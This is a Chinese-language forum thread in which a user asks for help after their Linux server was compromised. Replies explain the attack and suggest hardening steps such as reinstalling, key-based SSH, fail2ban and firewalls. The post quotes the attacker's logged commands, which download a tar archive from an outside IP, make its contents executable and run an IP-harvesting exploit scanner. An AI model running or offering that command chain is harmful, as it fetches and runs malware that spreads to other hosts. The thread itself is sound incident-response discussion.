V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
fantasticlw
V2EX  ›  信息安全

服务器被攻击,如何解决

  •  
  •   fantasticlw · 2023-04-27 19:25:39 +08:00 · 3751 次点击
    这是一个创建于 567 天前的主题,其中的信息可能已经有所发展或是发生改变。

    自己的 Linux 服务器应该被攻击了,看日志查看到以下的执行命令

    curl -O 167.235.199.99/.mini/.msq.tar;
    tar xvf .msq.tar;
    rm -rf .msq.tar ; cd .msq;
    chmod +x *; 
    ip addr > .ipss ;
    grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' .ipss > .regexout;
    ./exploitips
    

    自己的显卡暂时还没有被征用

    有大佬知道167.235.199.99/.mini/.msq.tar压缩包内可执行程序会干什么事情吗?(在虚拟机下尝试)

    个人水平差,望赐教! 以及接下来该怎么做呢?重新安装系统?

    19 条回复    2023-04-28 19:25:57 +08:00
    sheeta
        1
    sheeta  
       2023-04-27 19:26:23 +08:00   ❤️ 1
    重装最好
    MoeMoesakura
        2
    MoeMoesakura  
       2023-04-27 19:36:43 +08:00   ❤️ 1
    1.去丢在线沙盒里跑
    2.建议重装,但是记得先看 last 跟 lastb ,记录一下 IP
    JoshuaBen
        3
    JoshuaBen  
       2023-04-27 19:45:33 +08:00   ❤️ 1
    看起来是在横向移动扩散,找内网的其他资产
    CodeCodeStudy
        4
    CodeCodeStudy  
       2023-04-27 19:51:12 +08:00   ❤️ 1
    好像是尝试用弱口令扫码局域网 IP
    bjzhush
        5
    bjzhush  
       2023-04-27 20:37:45 +08:00   ❤️ 1

    解压之后看到有这几个文件,基本上就是扫描、提权、大马这一类的,先把你重要数据备份到本地或者别的服务器吧
    Calen
        6
    Calen  
       2023-04-27 21:44:13 +08:00 via iPhone   ❤️ 1
    方便问一下您的服务器密码是什么吗?类似的例子就行。
    fantasticlw
        7
    fantasticlw  
    OP
       2023-04-27 22:10:37 +08:00 via iPhone
    @Calen 因为要给朋友用,所以他们的就和用户名一致😕疏忽了
    1KTN90lKW9gVJ9vX
        8
    1KTN90lKW9gVJ9vX  
       2023-04-27 23:50:48 +08:00 via Android   ❤️ 1
    关机,睡觉。
    namelesswryyy
        9
    namelesswryyy  
       2023-04-28 00:15:00 +08:00 via Android   ❤️ 1
    找运行中的程序位置,有没有奇怪的 path
    有专门做 process 名伪装的,能伪装名字但位置能看到

    找 crontab 有没有奇怪的定时任务

    封掉漏洞后,处理完再观察一段时间
    如果还有,可能就是系统文件被替换了
    建议把东西移走,重做
    但这种情况不太多
    JensenQian
        10
    JensenQian  
       2023-04-28 04:20:57 +08:00 via Android   ❤️ 1
    密钥登录,别用密码
    feng0vx
        11
    feng0vx  
       2023-04-28 08:15:40 +08:00 via iPhone   ❤️ 1
    重装,换密钥登陆,禁用 root 登陆,密码 uuid 生成
    dode
        12
    dode  
       2023-04-28 09:19:02 +08:00   ❤️ 1
    dode
        13
    dode  
       2023-04-28 09:37:43 +08:00
    备份数据,重装系统,禁用 ssh 密码登陆
    xiaoqiao24
        14
    xiaoqiao24  
       2023-04-28 09:56:05 +08:00
    @dode 是不是可以添加大写呢 或者加个开关支持大写?
    documentzhangx66
        15
    documentzhangx66  
       2023-04-28 09:58:01 +08:00
    楼主思路完全搞错了。

    1.重装。

    2.没必要禁用 root ,也没必要换秘钥登录。root 使用至少 16 位复杂密码,包含数字、字符、大小写字母。

    3.安装 fail2ban 。

    4.常见服务,比如 nginx 、mysql ,不要直接暴露端口到公网,要过一遍防火墙与 WAF 。

    5.如果没有防火墙与 WAF ,那就用 WireGuard 给服务器组加密虚拟网络,需要使用服务器的电脑,在 WireGuard 网络里访问服务器。

    6.服务器 SSH 端口,要做白名单,仅允许认识的 IP 地址连接。
    salmon5
        17
    salmon5  
       2023-04-28 13:51:42 +08:00
    root+至少 20 位的 大小写+数字 随机密码,能避免 99.99%的攻击
    dode
        18
    dode  
       2023-04-28 14:18:35 +08:00
    @xiaoqiao24 这是我自用的,代码也很简单,一个 html 文件,你可以存一个自己改,一般要求大写的服务就换一下首个字母,现在浏览器也支持自动生成密码.
    feng0vx
        19
    feng0vx  
       2023-04-28 19:25:57 +08:00
    @dode 位数太少了,参考 uuidgen
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1947 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 16:25 · PVG 00:25 · LAX 08:25 · JFK 11:25
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.